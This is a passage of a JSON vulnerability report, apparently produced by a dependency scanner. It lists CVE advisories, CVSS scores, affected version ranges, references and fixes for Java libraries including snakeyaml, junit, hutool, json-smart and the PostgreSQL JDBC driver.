Description","text":"Snakeyaml vulnerable to Stack overflow leading to denial of service"},{"category":"details","details":"Vulnerability Details","text":"# Snakeyaml vulnerable to Stack overflow leading to denial of service Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. 
This effect may support a denial of service attack."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"]},"references":[{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41854"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41854"},{"summary":"NetApp Advisory ntap-20240315-0009","url":"https://security.netapp.com/advisory/ntap-20240315-0009"},{"summary":"NetApp Advisory 
ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"]}],"title":"CVE-2022-41854/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-15250"]}],"cve":"CVE-2020-15250","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2020-10-12T17:33:00","ids":[{"system_name":"CVE Record","text":"CVE-2020-15250"},{"system_name":"GitHub Advisory","text":"GHSA-269g-pwp5-87pp"},{"system_name":"Junit Advisory","text":"TemporaryFolder"},{"system_name":"Oracle Advisory","text":"cpuapr2022"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Permission Assignment for Critical Resource","title":"Additional CWE: 732"},{"category":"description","details":"Vulnerability Description","text":"TemporaryFolder on unix-like systems does not limit access to created files"},{"category":"details","details":"Vulnerability Details","text":"# TemporaryFolder on unix-like systems does not limit access to created files ### Vulnerability The JUnit4 test rule 
[TemporaryFolder](https://junit.org/junit4/javadoc/4.13/org/junit/rules/TemporaryFolder.html) contains a local information disclosure vulnerability. Example of vulnerable code: ```java public static class HasTempFolder { @Rule public TemporaryFolder folder = new TemporaryFolder(); @Test public void testUsingTempFolder() throws IOException { folder.getRoot(); // Previous file permissions: `drwxr-xr-x`; After fix:`drwx------` File createdFile= folder.newFile(\"myfile.txt\"); // unchanged/irrelevant file permissions File createdFolder= folder.newFolder(\"subfolder\"); // unchanged/irrelevant file permissions // ... } } ``` ### Impact On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability **does not** allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. When analyzing the impact of this vulnerability, here are the important questions to ask: 1. Do the JUnit tests write sensitive information, like API keys or passwords, into the temporary folder? - If yes, this vulnerability impacts you, but only if you also answer 'yes' to question 2. - If no, this vulnerability does not impact you. 2. Do the JUnit tests ever execute in an environment where the OS has other untrusted users. _This may apply in CI/CD environments but normally won't be 'yes' for personal developer machines._ - If yes, and you answered 'yes' to question 1, this vulnerability impacts you. - If no, this vulnerability does not impact you. ### Patches Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using. - Java 1.7 and higher users: this vulnerability is fixed in 4.13.1. 
- Java 1.6 and lower users: **no patch is available, you must use the workaround below.** ### Workarounds If you are unable to patch, or are stuck running on Java 1.6, specifying the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability. ### References - [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html) - Fix commit https://github.com/junit-team/junit4/commit/610155b8c22138329f0723eec22521627dbc52ae #### Similar Vulnerabilities - Google Guava - https://github.com/google/guava/issues/4011 - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945 - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824 ### For more information If you have any questions or comments about this advisory, please pen an issue in [junit-team/junit4](https://github.com/junit-team/junit4/issues)."}],"product_status":{"known_affected":["junit/junit@vers:maven/>=4.7|<4.13.1"],"known_not_affected":["junit/junit@4.13.1"]},"references":[{"summary":"GitHub Advisory GHSA-269g-pwp5-87pp","url":"https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp"},{"summary":"Junit Advisory TemporaryFolder","url":"https://junit.org/junit4/javadoc/4.13/org/junit/rules/TemporaryFolder.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01110833b63616ddbef59ae4e10c0fbd0060f0a51206defd4cb4d917@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r09cfbb5aedd76023691bbce9ca4ce2e16bb07dd37554a17efc19935d@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1209986f79359b518d09513ff05a88e5b3c398540e775edea76a4774@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r29d703d1986d9b871466ff24082a1828ac8ad27bb0965a93a383872e@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2b78f23bc2711a76a7fc73ad67b7fcd6817c5cfccefd6f30a4f54943@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r30f502d2f79e8d635361adb8108dcbb73095163fcbd776ee7984a094@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r500517c23200fb2fdb0b82770a62dd6c88b3521cfb01cfd0c76e3f8b@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5f8841507576f595bb783ccec6a7cb285ea90d4e6f5043eae0e61a41@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r687f489b10b0d14e46f626aa88476545e1a2600b24c4ebd3c0d2a10b@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r717877028482c55acf604d7a0106af4ca05da4208c708fb157b53672@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r742b44fd75215fc75963b8ecc22b2e4372e68d67d3d859d2b5e8743f@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8b02dc6f18df11ff39eedb3038f1e31e6f90a779b1959bae65107279@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r925eaae7dd8f77dd61eefc49c1fcf54bd9ecfe605486870d7b1e9390@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r934208a520b38f5cf0cae199b6b076bfe7d081809528b0eff2459e40@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r95f8ef60c4b3a5284b647bb3132cda08e6fadad888a66b84f49da0b0@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache 
Mailing List","url":"https://lists.apache.org/thread.html/r9710067c7096b83cb6ae8f53a2f6f94e9c042d1bf1d6929f8f2a2b7a@%3Ccommits.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra1bdb9efae84794e8ffa2f8474be8290ba57830eefe9714b95da714b@%3Cdev.pdfbox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raebf13f53cd5d23d990712e3d11c80da9a7bae94a6284050f148ed99@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2771949c676ca984e58a5cd5ca79c2634dee1945e0406e48e0f8457@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2ffe2993f4dccc48d832e1a0f1c419477781b6ea16e725ca2276dbb@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb33212dab7beccaf1ffef9b88610047c644f644c7a0ebdc44d77e381@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbaec90e699bc7c7bd9a053f76707a36fda48b6d558f31dc79147dbf9@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc49cf1547ef6cac1be4b3c92339b2cae0acacf5acaba13cfa429a872@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdbdd30510a7c4d0908fd22075c02b75bbc2e0d977ec22249ef3133cb@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rde385b8b53ed046600ef68dd6b4528dea7566aaddb02c3e702cc28bc@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rde8e70b95c992378e8570e4df400c6008a9839eabdfb8f800a3e5af6@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rdef7d1380c86e7c0edf8a0f89a2a8db86fce5e363457d56b722691b4@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rea812d8612fdc46842a2a57248cad4b01ddfdb1e9b037c49e68fdbfb@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reb700e60b9642eafa4b7922bfee80796394135aa09c7a239ef9f7486@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf2ec93f4ca9a97d1958eb4a31b1830f723419ce9bf2018a6e5741d5b@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf6e5d894d4b03bef537c9d6641272e0197c047c0d1982b4e176d0353@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf797d119cc3f51a8d7c3c5cbe50cb4524c8487282b986edde83a9467@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/11/msg00003.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15250"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15250"},{"summary":"Oracle Advisory 
cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":4.4,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":4.4,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":4.4,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N","version":"3.1"},"products":["junit/junit@vers:maven/>=4.7|<4.13.1"]}],"title":"CVE-2020-15250/pkg:maven/junit/junit@4.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-24163"]}],"cve":"CVE-2023-24163","cwe":{"id":"89","name":"Improper Neutralization of Special Elements used in an SQL Command"},"discovery_date":"2023-01-31T18:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-24163"},{"system_name":"Gitee Advisory","text":"I6AJWJ"},{"system_name":"Gitee Advisory","text":"hutool"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Dromara hutool vulnerable to SQL Injection"},{"category":"details","details":"Vulnerability Details","text":"# Dromara hutool vulnerable to SQL Injection SQL Inection vulnerability in Dromara hutool v5.8.11 allows attacker to execute arbitrary code via the aviator template engine."}],"product_status":{"known_affected":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<5.8.21"],"known_not_affected":["cn.hutool/hutool-all@5.8.21"]},"references":[{"summary":"Gitee Advisory hutool","url":"https://gitee.com/dromara/hutool"},{"summary":"Gitee Advisory 
I6AJWJ","url":"https://gitee.com/dromara/hutool/issues/I6AJWJ#note_15801868"},{"summary":"Gitee Advisory I6AJWJ","url":"https://gitee.com/dromara/hutool/issues/I6AJWJ#note_20057806_link"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24163"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24163"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<5.8.21"]}],"title":"CVE-2023-24163/pkg:maven/cn.hutool/hutool-all@5.8.10?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-24162"]}],"cve":"CVE-2023-24162","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2023-01-31T18:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-24162"},{"system_name":"Gitee Advisory","text":"I6AEX2"},{"system_name":"Gitee Advisory","text":"hutool"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Dromara Hutool Deserialization of Untrusted Data vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Dromara Hutool Deserialization of Untrusted Data vulnerability Deserialization vulnerability in Dromara Hutool v5.8.11 allows attacker to execute arbitrary code via the 
XmlUtil.readObjectFromXml parameter."}],"product_status":{"known_affected":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<=5.8.11"]},"references":[{"summary":"Gitee Advisory hutool","url":"https://gitee.com/dromara/hutool"},{"summary":"Gitee Advisory I6AEX2","url":"https://gitee.com/dromara/hutool/issues/I6AEX2"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24162"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24162"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<=5.8.11"]}],"title":"CVE-2023-24162/pkg:maven/cn.hutool/hutool-all@5.8.10?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-51074"]}],"cve":"CVE-2023-51074","cwe":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2023-12-27T21:31:01","ids":[{"system_name":"CVE Record","text":"CVE-2023-51074"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"json-path Out-of-bounds Write vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# json-path Out-of-bounds Write vulnerability json-path v2.8.0 was discovered to contain a stack overflow via the `Criteria.parse()` 
method."}],"product_status":{"known_affected":["com.jayway.jsonpath/json-path@vers:maven/>=2.2.0|<2.9.0"],"known_not_affected":["com.jayway.jsonpath/json-path@2.9.0"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-51074"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-51074"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","version":"3.1"},"products":["com.jayway.jsonpath/json-path@vers:maven/>=2.2.0|<2.9.0"]}],"title":"CVE-2023-51074/pkg:maven/com.jayway.jsonpath/json-path@2.2.0?type=jar"},{"cve":"CVE-2023-1370","cwe":{"id":"674","name":"Uncontrolled Recursion"},"discovery_date":"2023-03-23T20:32:03","ids":[{"system_name":"CVE Record","text":"CVE-2023-1370"},{"system_name":"GitHub Advisory","text":"GHSA-493p-pfq6-5258"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-NETMINIDEV-3369748"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"},{"system_name":"JFrog Advisory","text":"stack-exhaustion-in-json-smart-leads-to-denial-of-service-when-parsing-malformed-json-xray-427633"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"json-smart Uncontrolled Recursion vulnerabilty"},{"category":"details","details":"Vulnerability Details","text":"# json-smart Uncontrolled Recursion vulnerabilty ### Impact Affected versions 
of [net.minidev:json-smart](https://github.com/netplex/json-smart-v1) are vulnerable to Denial of Service (DoS) due to a StackOverflowError when parsing a deeply nested JSON array or object. When reaching a ‘[‘ or ‘{‘ character in the JSON input, the code parses an array or an object respectively. It was discovered that the 3PP does not have any limit to the nesting of such arrays or objects. Since the parsing of nested arrays and objects is done recursively, nesting too many of them can cause stack exhaustion (stack overflow) and crash the software. ### Patches This vulnerability was fixed in json-smart version 2.4.9, but the maintainer recommends upgrading to 2.4.10, due to a remaining bug. ### Workarounds N/A ### References - https://www.cve.org/CVERecord?id=CVE-2023-1370 - https://nvd.nist.gov/vuln/detail/CVE-2023-1370 - https://security.snyk.io/vuln/SNYK-JAVA-NETMINIDEV-3369748"}],"product_status":{"known_affected":["net.minidev/json-smart@vers:maven/>=1.0.6.3|<=2.4.8"],"known_not_affected":["net.minidev/json-smart@2.4.10"]},"references":[{"summary":"GitHub Advisory GHSA-493p-pfq6-5258","url":"https://github.com/oswaldobapvicjr/jsonmerge/security/advisories/GHSA-493p-pfq6-5258"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1370"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1370"},{"summary":"JFrog Advisory stack-exhaustion-in-json-smart-leads-to-denial-of-service-when-parsing-malformed-json-xray-427633","url":"https://research.jfrog.com/vulnerabilities/stack-exhaustion-in-json-smart-leads-to-denial-of-service-when-parsing-malformed-json-xray-427633"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"summary":"Snyk Advisory SNYK-JAVA-NETMINIDEV-3369748","url":"https://security.snyk.io/vuln/SNYK-JAVA-NETMINIDEV-3369748"},{"summary":"Cve 
2023","url":"https://www.cve.org/CVERecord?id=CVE-2023-1370"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["net.minidev/json-smart@vers:maven/>=1.0.6.3|<=2.4.8"]}],"title":"CVE-2023-1370/pkg:maven/net.minidev/json-smart@2.2.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-27568"]}],"cve":"CVE-2021-27568","cwe":{"id":"754","name":"Improper Check for Unusual or Exceptional Conditions"},"discovery_date":"2021-06-16T18:03:47","ids":[{"system_name":"CVE Record","text":"CVE-2021-27568"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Check for Unusual or Exceptional Conditions in json-smart"},{"category":"details","details":"Vulnerability Details","text":"# Improper Check for Unusual or Exceptional Conditions in json-smart An issue was discovered in netplex json-smart-v1 through 2015-10-23 and json-smart-v2 through 2.4. An exception is thrown from a function, but it is not caught, as demonstrated by NumberFormatException. 
When it is not caught, it may cause programs using the library to crash or expose sensitive information."}],"product_status":{"known_affected":["net.minidev/json-smart@vers:maven/>=2.0.0|<2.3.1"],"known_not_affected":["net.minidev/json-smart@2.3.1"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6287f5aa628c8d9af52b5401ec6cc51b6fc28ab20d318943453e396@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re237267da268c690df5e1c6ea6a38a7fc11617725e8049490f58a6fa@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf70210b4d63191c0bfb2a0d5745e104484e71703bf5ad9cb01c980c6@%3Ccommits.druid.apache.org%3E"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-27568"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-27568"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["net.minidev/json-smart@vers:maven/>=2.0.0|<2.3.1"]}],"title":"CVE-2021-27568/pkg:maven/net.minidev/json-smart@2.2.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-41946"]}],"cve":"CVE-2022-41946","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2022-11-23T22:17:25","ids":[{"system_name":"CVE Record","text":"CVE-2022-41946"},{"system_name":"GitHub Advisory","text":"GHSA-562r-vg33-8x8h"},{"system_name":"NetApp Advisory","text":"ntap-20240329-0003"}],"notes":[{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"category":"description","details":"Vulnerability Description","text":"TemporaryFolder on unix-like systems does not limit access to created files"},{"category":"details","details":"Vulnerability Details","text":"# TemporaryFolder on unix-like systems does not limit access to created files **Vulnerability** `PreparedStatement.setText(int, InputStream)` and `PreparedStatemet.setBytea(int, InputStream)` will create a temporary file if the InputStream is larger than 51k Example of 
vulnerable code: ```java String s = \"some very large string greater than 51200 bytes\"; PreparedStatement.setInputStream(1, new ByteArrayInputStream(s.getBytes()) ); ``` This will create a temporary file which is readable by other users on Unix like systems, but not MacOS. Impact On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. When analyzing the impact of this vulnerability, here are the important questions to ask: Is the driver running in an environment where the OS has other untrusted users. If yes, and you answered 'yes' to question 1, this vulnerability impacts you. If no, this vulnerability does not impact you. Patches Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using. Java 1.8 and higher users: this vulnerability is fixed in 42.2.27, 42.3.8, 42.4.3, 42.5.1 Java 1.7 users: this vulnerability is fixed in 42.2.27.jre7 Java 1.6 and lower users: no patch is available; you must use the workaround below. Workarounds If you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability. 
References [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html) Fix commit https://github.com/pgjdbc/pgjdbc/commit/9008dc9aade6dbfe4efafcd6872ebc55f4699cf5 Similar Vulnerabilities Google Guava - https://github.com/google/guava/issues/4011 Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945 JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824 ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-41946, CVE-2022-41946"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.8"],"known_not_affected":["org.postgresql/postgresql@42.3.8"]},"references":[{"summary":"GitHub Advisory GHSA-562r-vg33-8x8h","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-562r-vg33-8x8h"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00003.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD"},{"summary":"Fedora Project Mailing 